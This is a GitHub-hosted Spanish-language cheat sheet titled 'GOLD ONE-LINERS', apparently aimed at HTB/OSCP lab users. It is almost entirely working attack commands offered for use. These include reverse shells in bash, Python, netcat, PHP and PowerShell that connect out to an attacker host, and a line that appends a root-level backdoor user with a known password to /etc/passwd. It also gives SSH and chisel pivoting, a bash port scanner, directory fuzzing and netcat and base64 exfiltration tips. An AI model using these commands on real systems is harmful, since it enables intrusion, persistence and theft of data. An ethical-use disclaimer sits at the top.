-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathGOLD_ONELINERS.txt
More file actions
108 lines (77 loc) · 7.33 KB
/
Copy pathGOLD_ONELINERS.txt
File metadata and controls
108 lines (77 loc) · 7.33 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
═══════════════════════════════════════════════════════════════════════════
GOLD ONE-LINERS - TOP 15 COMANDOS QUE SÍ USARÁS
Pack 1000 Subs | @3diklab
═══════════════════════════════════════════════════════════════════════════
⚠️ USO ÉTICO ÚNICAMENTE - LAB AUTORIZADO / HTB / OSCP
Uso no autorizado es ILEGAL y puede resultar en cargos criminales.
═══════════════════════════════════════════════════════════════════════════
🔴 REVERSE SHELLS - LOS 5 QUE SIEMPRE FUNCIONAN
═══════════════════════════════════════════════════════════════════════════
[1] BASH - El clásico infalible
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
[2] PYTHON - Upgrade a TTY interactivo
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
[3] NETCAT - Cuando bash está restringido
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.5 4444 >/tmp/f
[4] PHP - Para web shells
php -r '$sock=fsockopen("10.10.14.5",4444);exec("/bin/bash -i <&3 >&3 2>&3");'
[5] POWERSHELL - Windows reverse shell (one-liner)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
═══════════════════════════════════════════════════════════════════════════
⚡ TTY UPGRADE - Conseguir shell interactiva
═══════════════════════════════════════════════════════════════════════════
[6] Upgrade completo (ejecutar en orden):
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Ctrl+Z (background)
stty raw -echo; fg
# Enter x2
export TERM=xterm
export SHELL=bash
═══════════════════════════════════════════════════════════════════════════
🔐 PRIVESC - Descubrir el camino a root
═══════════════════════════════════════════════════════════════════════════
[7] SUID binaries - El oro de PrivEsc
find / -perm -4000 -type f 2>/dev/null
[8] SUDO misconfiguration - Qué puedo ejecutar
sudo -l
[9] CAPABILITIES - El PrivEsc olvidado
getcap -r / 2>/dev/null
[10] Writable /etc/passwd - Game over
echo 'hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:root:/root:/bin/bash' >> /etc/passwd
# Password: hacker123
═══════════════════════════════════════════════════════════════════════════
🌐 NETWORK PIVOTING - Movimiento lateral
═══════════════════════════════════════════════════════════════════════════
[11] SSH Local Port Forwarding - Acceder a puerto interno
ssh -L 8080:localhost:80 user@10.10.10.5
[12] SSH Dynamic Port Forwarding - SOCKS proxy
ssh -D 9050 user@10.10.10.5
# Luego usa: proxychains nmap ...
[13] Chisel - Tunneling sin SSH
# Attacker: ./chisel server -p 8000 --reverse
# Victim: ./chisel client 10.10.14.5:8000 R:8080:127.0.0.1:80
═══════════════════════════════════════════════════════════════════════════
🔍 RECONOCIMIENTO - Escaneo sin nmap
═══════════════════════════════════════════════════════════════════════════
[14] Port scan con Bash puro (post-exploitation sin tools)
for PORT in {1..1000}; do timeout 1 bash -c "</dev/tcp/172.17.0.1/$PORT" &>/dev/null && echo "Puerto $PORT abierto"; done
[15] Web fuzzing básico con curl
for DIR in admin login backup config uploads; do curl -s -o /dev/null -w "%{http_code} - $DIR\n" http://10.10.10.5/$DIR/; done
═══════════════════════════════════════════════════════════════════════════
💡 TIPS RÁPIDOS
═══════════════════════════════════════════════════════════════════════════
• Listener en attacker machine: nc -lvnp 4444
• Transferir archivos HTTP: python3 -m http.server 8000
• Transferir con netcat: nc -lvnp 4444 > archivo (receiver) | nc IP 4444 < archivo (sender)
• Base64 exfiltration: cat /etc/passwd | base64 -w0
• Buscar passwords: grep -ri "password" /var/www/html 2>/dev/null
═══════════════════════════════════════════════════════════════════════════
📖 RECURSOS
═══════════════════════════════════════════════════════════════════════════
GTFOBins → https://gtfobins.github.io/
RevShells → https://www.revshells.com/
PayloadsAll → https://github.com/swisskyrepo/PayloadsAllTheThings
HackTricks → https://book.hacktricks.xyz/
═══════════════════════════════════════════════════════════════════════════
🕶️ @3diklab | Pack 1000 Subs | Uso Ético Únicamente
═══════════════════════════════════════════════════════════════════════════